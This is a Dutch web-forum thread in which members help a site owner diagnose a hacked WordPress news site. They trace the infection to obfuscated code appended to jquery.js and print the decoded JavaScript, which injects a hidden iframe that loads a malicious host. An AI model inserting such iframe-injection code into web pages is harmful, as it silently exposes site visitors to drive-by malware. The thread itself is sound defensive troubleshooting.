[PHP/ALG]Virus in site niet te vinden maar wel gedetecteerd

vrijdag 29 juli 2011 21:18

Acties:

0 Henk 'm!

Topicstarter

Beste Mede-Tweakers,

Ik heb samen met iemand anders een site gemaakt voor een nieuwssite. Deze site draait op Wordpress. Er wordt gebruik gemaakt van een webhosting waarvan we zelf niet volledig de touwtjes in handen hebben, maar het wordt gesponsord.
Helaas is begin deze week (maandag) ingebroken in de FTP-Server. Hierbij zijn alle index bestanden vervangen door "geïnfecteerde" bestanden die een stuk transcript droegen.
Ik heb toen de zelfde dag nog alle bestanden vervangen door een back-up die ik gelukkig had. Het probleem is dat AVG, en ook AVG alleen weergeeft dat de site een virus bevat (Rapport (hier vind je tevens de URL van de site)).
Weet iemand hoe ik hier meer info over kan krijgen of dat dit vanzelf weer weg gaat, want ik heb alle geïnfecteerde bestanden er af gegooid.

Alvast dank

vrijdag 29 juli 2011 21:21

Acties:

0 Henk 'm!

MueR

Admin Tweakers Discord

is niet lief

Vaak is dat een stuk caching, net als de Malware Found melding van een Google.

Laat het een wijze les zijn om gewoon fatsoenlijke hosting te huren.

Anyone who gets in between me and my morning coffee should be insecure.

vrijdag 29 juli 2011 21:22

Acties:

0 Henk 'm!

Onbekend

...

martin149 schreef op vrijdag 29 juli 2011 @ 21:18:
Beste Mede-Tweakers,

Ik heb samen met iemand anders een site gemaakt voor een nieuwssite. Deze site draait op Wordpress. Er wordt gebruik gemaakt van een webhosting waarvan we zelf niet volledig de touwtjes in handen hebben, maar het wordt gesponsord.
Helaas is begin deze week (maandag) ingebroken in de FTP-Server. Hierbij zijn alle index bestanden vervangen door "geïnfecteerde" bestanden die een stuk transcript droegen.
Ik heb toen de zelfde dag nog alle bestanden vervangen door een back-up die ik gelukkig had. Het probleem is dat AVG, en ook AVG alleen weergeeft dat de site een virus bevat (Rapport (hier vind je tevens de URL van de site)).
Weet iemand hoe ik hier meer info over kan krijgen of dat dit vanzelf weer weg gaat, want ik heb alle geïnfecteerde bestanden er af gegooid.

Alvast dank

Heb je een hoofddomein? Of heb je een subdomein?
Bij een subdomein krijg je ook een virusmelding als iemand anders op een ander subdomein een virus heeft.
Anders ligt het echt bij jou en raad ik aan om alle bestanden op de ftp te overschrijven met een eigen backup. Die melding gaat uiteindelijk vanzelf weg.

Speel ook Balls Connect en Repeat

vrijdag 29 juli 2011 21:26

Acties:

0 Henk 'm!

martin149

Topicstarter

Het gaat hier om een hoofddomein, die ongeveer 10.000-20.000 bezoekers per dag trekt, daarom is hosting redelijk prijzig en hebben we het zo. Wel zulle een berichtje plaatsen en maar afwachten dan...

vrijdag 29 juli 2011 21:35

Acties:

0 Henk 'm!

Voutloos

martin149 schreef op vrijdag 29 juli 2011 @ 21:18:
alle bestanden vervangen door een back-up die ik gelukkig had.

Gelukkig? Backups heb je altijd en je versiebeheer heb je altijd. Dus je hebt altijd 2 bronnen.

Zo niet, dan is dat het echte probleem.

{signature}

vrijdag 29 juli 2011 21:43

Acties:

0 Henk 'm!

Alfa Novanta

VRRROOOAAARRRP

Nod32 pikte hem er hier ook uit daarnet en blokkeerde een 85.x.x.x adres als ik mij niet vergis, maar de pop-up was al snel weer weg en ik kan hier geen logs voor vinden

edit: nog met een 2e pc met Nod32 de site bezocht, maar deze geeft geen waarschuwing.
Het lijkt me dan te zitten in content wat ververst en veranderd. Misschien content die zo nu en dan er op staat .. ? Dat Twitter spul misschien?

[ Voor 40% gewijzigd door Alfa Novanta op 29-07-2011 22:03 ]

vrijdag 29 juli 2011 22:00

Acties:

0 Henk 'm!

martin149

Topicstarter

virustotal.com:

code:

URL analysis tool   Result
Avira               Clean site
BitDefender     Clean site
Dr.Web          Clean site
G-Data          Clean site
Malc0de Database    Clean site
MalwareDomainList   Clean site
Opera           Clean site
ParetoLogic     Clean site
Phishtank           Clean site
TrendMicro      Clean site
Websense ThreatSeeker   Clean site
Wepawet         Unrated site

zaterdag 30 juli 2011 00:24

Acties:

0 Henk 'm!

Voutloos

Erm, krijg allemaal .exe shit naar mijn hoofd geslingerd (anti-vir meldingen) op die site, dus doe iedereen en plezier en haal dat ding down en kijk er eens rustig naar.

WTF Is infolinesw[punt]biz (niet zomaar heen gaan)? Probeert nu iets op localhost te doen, geen idee of dat komt omdat een virusscanner iets blokt of dat het een trucje is, maar wellicht is dat ding niet in de haak.

Anyway, ing._Buttje meldde al een probleem dat er nog altijd was, dus als je ook maar een beetje gevoel voor verantwoordelijkheid/ethiek had, had je je site al dicht moeten gooien. Nu slaap je wellicht al, terwijl je je bezoekers besmet, way to go.

[ Voor 69% gewijzigd door Voutloos op 30-07-2011 00:36 ]

{signature}

zaterdag 30 juli 2011 00:37

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Waar hoort mijn topic?
PRG >> BV

Als je site besmet is met een virus moet je sowieso een paar dingen doen:

Wachtwoorden wijzigen (ftp/ssh/whatever)
Die wachtwoorden niet opslaan in FileZilla of eender welke FTP client voor 't geval je malware op je eigen PC hebt die die gegevens doorspeelt naar een kwaadwillende
Je site/cms/platform grondig controleren op bekende exploits e.d. en de zooi updaten/bijwerken/fixen waar nodig
Je site weer online zetten en als een havik de komende dagen in de smiezen houden

Urlvoid geeft ook groen licht, evenals McAfee en Google Safe browsing. Ik weet dus even niet wie ik nu zo snel moet geloven

(Niet dat ik zeg dat diegenen die klachten hebben liegen! Zie laatste alinea)

Het is jammer dat AVG niet specifiek is in waar het virus dan is aangetroffen op je site (althans: ik zie 't nergens). Was dat in de "homepage HTML"? Of ergens in een gerefereerde .js file? In een "kwaadaardige jpg" (ik noem maar wat) of ...?

Een handig truukje om je site niet met een browser te hoeven bezoeken is domweg notepad starten -> bestand -> openen -> http://jedomein.nl invoeren en dan de HTML eens even rustig te bekijken en te speuren naar verdachte <script>/<iframe>/<object>/<applet>/etc.-tags. Dat heb ik met jou site gedaan en daar kon ik zo snel niets geks in bespeuren. Datzelfde doe je dan voor alle resources (vooral .js files maar check ook even .css etc. files) en die leg je dan ook even onder de loep; op zoek naar 'rare zaken' die je er zelf niet in gestopt hebt (of die na een diff met je backup/versioncontrol niet overeenkomen).

Dan kunnen er nog enge dingen in binary files (vooral pdf maar wie weet ook jpg/gif/mp3/weetikhet) zitten. Neem de resources van die pagina en probeer ze 1 voor 1 te downloaden (met een actieve virusscanner en liefst in een VM oid). Om er zeker van te zijn dat deze bestanden geen rommel bevatten kun je ze nog een keer door Jotti scan oid raggen.

Kijk vooral goed naar zaken die je bij derden vandaan haalt; vooral iframes (ook al haal je daarmee zaken van vertrouwde/bekende domeinen) kunnen voor "false positives" zorgen; als (bekende/vertrouwde) site X een virus heeft (of een injection attack heeft gehad of...) en je haalt daar je content vandaan dan serveer je diezelfde rommel dus ook (indirect) aan je bezoekers. Ook twitter of andere "grote jongens" hebben daar wel eens last van. Ga er niet blind van uit dat 't daar wel snor zal zitten (maar bedenk wel dat, als twitter (bijv.) een probleem zou hebben op een bepaald moment, dat inmiddels waarschijnlijk wel lang-en-breed bekend zou zijn).

Levert dat allemaal geen probleem op dan bezoek je (wederom, bij voorkeur in een VM) je site met een browser en hou je weer je systeem (en processen e.d.) scherp in de gaten op zoek naar verdachte activiteit (nieuwe processen, veel I/O, vage files in temp directories, dat soort zaken).

Er zijn nog wel wat haken en ogen (notepad stuurt bijv. geen useragent mee waardoor de kwaadaardige code misschien wel niet uitgespuugd wordt om zo "verborgen" te blijven of de malware target misschien alleen maar IE of een andere browser met een bekende exploit) maar als je dit allemaal doet heb je in ieder geval al heel erg je best gedaan

[ Voor 151% gewijzigd door RobIII op 30-07-2011 01:12 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 00:58

Acties:

0 Henk 'm!

Alfa Novanta

VRRROOOAAARRRP

je hebt ook zo'n register-tool die modificaties in de gaten houdt en je perfect kan aangeven na een gebeurtenis welke sleutels er aan toegevoegd zijn, maar ik ben even de naam kwijt

Ik denk dat het Regshot was,

http://sourceforge.net/pr....8.2_src_bin.zip/download

Regshot is an open-source(GPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product.

Maargoed, als je goede anti-virus hebt, komt het zover niet want dan worden deze acties geblokkeerd.

[ Voor 8% gewijzigd door Alfa Novanta op 30-07-2011 00:59 ]

zaterdag 30 juli 2011 01:00

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

ing._Buttje schreef op zaterdag 30 juli 2011 @ 00:58:
je hebt ook zo'n register-tool die modificaties in de gaten houdt en je perfect kan aangeven na een gebeurtenis welke sleutels er aan toegevoegd zijn, maar ik ben even de naam kwijt
Ik denk dat het Regshot was,

http://sourceforge.net/pr....8.2_src_bin.zip/download

[...]

Iedereen die een beetje serieus z'n systeem (op minitieus niveau wanneer gewenst) in de gaten wil houden gebruikt natuurlijk gewoon de SysInternals Suite en in dit soort gevallen (virussen) kan een VM (of PC die toch aan herinstallatie toe is

) ook zeker geen kwaad.

ing._Buttje schreef op zaterdag 30 juli 2011 @ 00:58:

Maargoed, als je goede anti-virus hebt, komt het zover niet want dan worden deze acties geblokkeerd.

Bull. Elke antivirus, zelfs de beste, laat wel eens een steek vallen (of heeft een ietwat (of zelfs zwaar) verouderde virusdefinitie) of is wat later met detecteren van virus X dan de concurrentie of... 100% garantie heb je (en krijg je) nooit. Een virusscanner (of malwarescanner of...) maakt je niet opeens "bullet proof". Het helpt allicht tegen het gros van de meuk die er op de interwebz aanwezig is, maar als 't een "vers" virus is waarvoor nog niemand de tijd heeft gehad om 't te analyseren om in een virusdefinitiesupdatefiledinges op te nemen dan ga je gewoon slachtoffer worden.

[ Voor 34% gewijzigd door RobIII op 30-07-2011 01:03 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:09

Acties:

0 Henk 'm!

Voutloos

RobIII schreef op zaterdag 30 juli 2011 @ 00:37:
Ik weet dus even niet wie ik nu zo snel moet geloven (Niet dat ik zeg dat diegenen die klachten hebben liegen!

Er zit ergens een javascriptje verstopt, maar geen idee hoe je dat makkelijk kan traceren, welke dus er voor zorgt dat er een request gedaan wordt naar .biz, en die letterlijke url faalt in 1 van jouw tools.
http://www.siteadvisor.co...infolinesw.biz/in.cgi%3F2

{signature}

zaterdag 30 juli 2011 01:11

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:09:
[...]
Er zit ergens een javascriptje verstopt,

Dat geloof ik meteen, maar ik vond (zo snel) geen ".biz" met een CTRL-F in de broncode van de (vermeende) site in kwestie

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:12

Acties:

0 Henk 'm!

Voutloos

Nee, en blijkbaar vinden die tools het ook niet op basis van een (statische?) analyse, dus het zit goed verstopt.

{signature}

zaterdag 30 juli 2011 01:13

Acties:

0 Henk 'm!

Twazerty

AVCHDCoder developer

controleer ook je .htaccess bestand. Die was bij mij ook ooit geinfecteerd...

Ruisende versterker: schakel je subwoofer in.

zaterdag 30 juli 2011 01:17

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:12:
Nee, en blijkbaar vinden die tools het ook niet op basis van een (statische?) analyse, dus het zit goed verstopt.

Ik zie 'm nu ook...

Afbeeldingslocatie: http://tweakers.net/ext/f/mDEDzIywbLeVH0KhSuIopmaG/thumb.png

Dan nog een tip (op basis hiervan): Zet in je hostsfile (of lokale DNS als je die draait) even een verwijzing van infolinesw.biz naar 127.0.0.1 ofzo. Dan weet je iig zeker dat die meuk niet geladen wordt en kun je "in alle rust" op zoek naar waar die rommel vandaan komt en welke file het laden hiervan veroorzaakt. (En check dat ook even):

C:\>ping infolinesw.biz

Pingen naar infolinesw.biz [127.0.0.1] met 32 bytes aan gegevens:
Antwoord van 127.0.0.1: bytes=32 tijd<1 ms TTL=128

[ Voor 16% gewijzigd door RobIII op 30-07-2011 01:33 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:20

Acties:

0 Henk 'm!

Voutloos

De jquery.js eindigt met een eval() met allemaal geobfuscate (dus niet geminifyde) troep.

Fix is simpel: knikker dat het hele bestand weg en pak voortaan de jquery van googleapis.com vandaan.

[ Voor 39% gewijzigd door Voutloos op 30-07-2011 01:23 ]

{signature}

zaterdag 30 juli 2011 01:22

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:20:
De jquery.js eindigt met een eval() met allemaal geobfuscate (dus niet geminifyde) troep.

Jep, inderdaad. Even klooien, moment...

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:24

Acties:

0 Henk 'm!

Alfa Novanta

VRRROOOAAARRRP

RobIII schreef op zaterdag 30 juli 2011 @ 01:00:
[...]

Bull. Elke antivirus, zelfs de beste, laat wel eens een steek vallen (of heeft een ietwat (of zelfs zwaar) verouderde virusdefinitie) of is wat later met detecteren van virus X dan de concurrentie of... 100% garantie heb je (en krijg je) nooit. Een virusscanner (of malwarescanner of...) maakt je niet opeens "bullet proof". Het helpt allicht tegen het gros van de meuk die er op de interwebz aanwezig is, maar als 't een "vers" virus is waarvoor nog niemand de tijd heeft gehad om 't te analyseren om in een virusdefinitiesupdatefiledinges op te nemen dan ga je gewoon slachtoffer worden.

't is bedtijd, maar toch nog een vluchtige reactie ( ik lees het morgen nog wel beter door), maar meestal gaat het om user_error. Dus een pop-up en dan maar snel ergens op klikken waarmee je een script in gang zet wat dan gemachtigd is zulke acties te doen. Met toestemming dus als het ware. Échte virussen, tegenwoordig is het vaker een grijs gebied met ad-ware/spy-ware, worden door een anti-virus pakket vaak wel goed herkend. Echter is het juist de ad-ware, de downloaders die niet alleen dát virus maar meer ongein downloaden naar de pc .. dus wat is dan schadelijker, het virus of de ad-ware waarmee het kwam? We merkten op ons bedrijf dat de virusscanner van McAfee dus heel vaak niets vond en Malwarebytes juist vanalles! Echt een klassiek anti-virus pakket. Je moet apart een malware module bijkopen wil het feitelijk echt nut hebben..

trusten

zaterdag 30 juli 2011 01:25

Acties:

0 Henk 'm!

Voutloos

RobIII schreef op zaterdag 30 juli 2011 @ 01:22:
[...]

Jep, inderdaad. Even klooien, moment...

JavaScript:

if (document.getElementsByTagName('body')[0])
{           iframer();      
} else 
{           document.write("<iframe src='http://STOUTE_HOST/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");     
}       function iframer()
{           var f = document.createElement('iframe');f.setAttribute('src','http://STOUTE_HOST/in.cgi?2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');           document.getElementsByTagName('body')[0].appendChild(f);        
}

I win!

{signature}

zaterdag 30 juli 2011 01:25

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:25:
[...]

JavaScript:

if (document.getElementsByTagName('body')[0]){          iframer();      } else {            document.write("<iframe src='http://STOUTE_HOST/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");     }       function iframer(){         var f = document.createElement('iframe');f.setAttribute('src','http://STOUTE_HOST/in.cgi?2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');           document.getElementsByTagName('body')[0].appendChild(f);        }

I win!

Je bent me nét voor

Anyhow: @TS: die jquery file is dus f*cked. Even controleren of 'ie niet zo ook is ingechecked in je versioncontrol iig! En ga dan voortaan gewoon alle jQuery zaken meteen van een CDN serveren; heb je daar ook geen last meer van en krijg je gratis-en-voor-niets ook nog eens een boost in de laadtijd van je site

[ Voor 20% gewijzigd door RobIII op 30-07-2011 01:28 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:27

Acties:

0 Henk 'm!

Pascal

Het zit volgens mij in je http://*snip*.nl/wp-includes/js/jquery/jquery.js?ver=1.4.4
onderaan zie je aardig wat rotzooi (vanaf: ;jQuery.noConflict();) wat niet in de originele http://code.jquery.com/jquery-1.4.4.min.js zit.

moet vaker refreshen...

[ Voor 10% gewijzigd door Pascal op 30-07-2011 01:30 ]

zaterdag 30 juli 2011 01:34

Acties:

0 Henk 'm!

Voutloos

Het achterhalen waar dat element vandaan komt zou toch makkelijker moeten kunnen.

Overigens tuinde ik in een klassieke fout: Ik ging eerst in de minder frequente voorkomende js files zoeken omdat jquery niet spannend klinkt. Maar dat is bijzonder slechte logica, want juist een common file is het aanpassen waard.

{signature}

zaterdag 30 juli 2011 01:35

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:34:
Overigens tuinde ik in een klassieke fout:

Same here; plus dat ik er van uit ging dat, als er al malware tussen die minified bult code van jQuery zou zitten ik 't toch niet zou spotten (laat staan op dit uur

). Dat 't zo lekker "opvallend" gewoon achteraan de file zou staan had ik kunnen weten (of iig minimaal even moeten checken).

Voutloos schreef op zaterdag 30 juli 2011 @ 01:34:
Het achterhalen waar dat element vandaan komt zou toch makkelijker moeten kunnen.

Met een DOM inspector had je vast een iframe ergens zien verschijnen vermoed ik. Maar verder had ik zo snel ook geen idee hoe ik kon achterhalen waar wat ik binnen zag komen in mijn network tab nou door veroorzaakt werd.

[edit]
Confirmed

Afbeeldingslocatie: http://tweakers.net/ext/f/ITE61yB0bzcRbcbC0XMYETSC/thumb.png

[ Voor 40% gewijzigd door RobIII op 30-07-2011 01:41 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:42

Acties:

0 Henk 'm!

Voutloos

Voutloos schreef op zaterdag 30 juli 2011 @ 01:12:
Nee, en blijkbaar vinden die tools het ook niet op basis van een (statische?) analyse, dus het zit goed verstopt.

Hmz, nu het gevonden is: Behoorlijk pauper dat ze dit niet spotten. Doen ze uberhaupt iets met de js?

{signature}

zaterdag 30 juli 2011 01:44

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:42:
[...]
Hmz, nu het gevonden is: Behoorlijk pauper dat ze dit niet spotten. Doen ze uberhaupt iets met de js?

Ik vermoed dat ze naar bepaalde (delen van) "obfuscated strings" zoeken (een soort 'signature'); en gezien die etterbakken waarschijnlijk een shitload aan (al dan niet gehackte of eigen "gratis, tijdelijke") domeinen hebben waar ze die meuk op hosten moet die string maar net bekend zijn. Of je obfuscate met telkens een andere "x" (zie hieronder) dan heb je ook lekker makkelijk elke keer een andere signature bij een willekeurige infectie.

JavaScript:

1	eval(s(7+x,7+x,103+x,100+x,30+x,38+x,98+x,109+x,...snip...,7+x,7+x,123+x));

[ Voor 22% gewijzigd door RobIII op 30-07-2011 01:48 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:48

Acties:

0 Henk 'm!

Voutloos

Uiteraard, maar bij een heus 'report' verwacht (hoop) ik gewoon dat ze lekker allemaal evals uitvoeren. Zo niet dan is obfuscaten dusdanig eenvoudig dat je geen f*ck aan z'n tool hebt.

{signature}

zaterdag 30 juli 2011 01:50

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

Voutloos schreef op zaterdag 30 juli 2011 @ 01:48:
Uiteraard, maar bij een heus 'report' verwacht (hoop) ik gewoon dat ze lekker allemaal evals uitvoeren.

Misschien wel (deels) maar dat maakt 't wel behoorlijk lastig: zie bovenstaande JS; je moet eerst al "x" weten. Wat weer betekent dat je die ergens uitgekiend moet hebben. En die komt, for all we know, misschien wel weer als resultaat uit een functie die een hash van de dom-tree berekent of weet-ik-het waardoor je dus ook de dom moet opbouwen/hebben waardoor... etc. etc. Feitelijk kom je dan elk onderdeel van een browser behoorlijk aan 't nabouwen; dat gaat wat ver denk ik...? Een eval uitwerken van een string (a-la: eval('Um9iSUlJIHJ1bGVzIQ==');) lijkt me nog haalbaar, hoe ver ze er wérkelijk in gaan is beyond me

Ik ben geen anti-virus expert of scanenginebouwer

[ Voor 29% gewijzigd door RobIII op 30-07-2011 01:55 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

zaterdag 30 juli 2011 01:53

Acties:

0 Henk 'm!

Voutloos

Hmz misschien betere aanpak: begin met een capabele browser als basis, voer alles uit zoals ieder ander en registreer alle resources. Als je je aanvankelijk statische analyse steeds slimmer maakt kom je toch uiteindelijk op een browser uit.

edit:

Lol @ GMTA edit.

[ Voor 6% gewijzigd door Voutloos op 30-07-2011 01:53 ]

{signature}

zaterdag 30 juli 2011 07:20

Acties:

0 Henk 'm!

Anoniem: 55140

RobIII schreef op zaterdag 30 juli 2011 @ 01:50:
[...]

Feitelijk kom je dan elk onderdeel van een browser behoorlijk aan 't nabouwen; dat gaat wat ver denk ik...?

Nope, that's pretty much how it's done.

Een eval uitwerken van een string (a-la: eval('Um9iSUlJIHJ1bGVzIQ==');) lijkt me nog haalbaar, hoe ver ze er wérkelijk in gaan is beyond me Ik ben geen anti-virus expert of scanenginebouwer

Er worden tegenwoordig in sommige gevallen al verschillende scripts en/of html objecten aangeroepen om een eindresultaat te bouwen. We hebben een emulator die dat soort trucjes aankan. Het gaat redelijk ver.

Andere engines emuleren waarschijnlijk minder en zijn mogelijk wat 'stricter' wat obfuscatie betreft.

In dit geval wordt er gebruik gemaakt van een (nieuwe) anti-emulatie en een anti-detectietechniek.

zaterdag 30 juli 2011 12:21

Acties:

0 Henk 'm!

EdwinG

RobIII schreef op zaterdag 30 juli 2011 @ 01:25:
En ga dan voortaan gewoon alle jQuery zaken meteen van een CDN serveren; heb je daar ook geen last meer van en krijg je gratis-en-voor-niets ook nog eens een boost in de laadtijd van je site

Plus dat iedereen die bijvoorbeeld RequestPolicy gebruikt merkt dat je site niet goed werkt... (sommige adblockers kunnen hetzelfde effect hebben)

Bezoek eens een willekeurige pagina

zaterdag 30 juli 2011 15:12

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Wordpress
Javascript
Php

EdwinG schreef op zaterdag 30 juli 2011 @ 12:21:
[...]

Plus dat iedereen die bijvoorbeeld RequestPolicy gebruikt merkt dat je site niet goed werkt... (sommige adblockers kunnen hetzelfde effect hebben)

Het gebruik van een CDN is steeds meer common-practise. Als een "RequestPolicy" of AdBlocker dat soort zaken niet standaard uitsluit van filtering zal het product niet lang bestaan omdat gebruikers steen en been zullen klagen dat ze -tig sites niet (fatsoenlijk) kunnen bezoeken.
Maar goed; je kunt ook prima je eigen jQuery hosten hoor als je daar happy van wordt. Ik profiteer liever van een CDN, gebruikers die (aardige kans) al een sloot van die bestanden gecached hebben etc. etc.

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Onderwerpen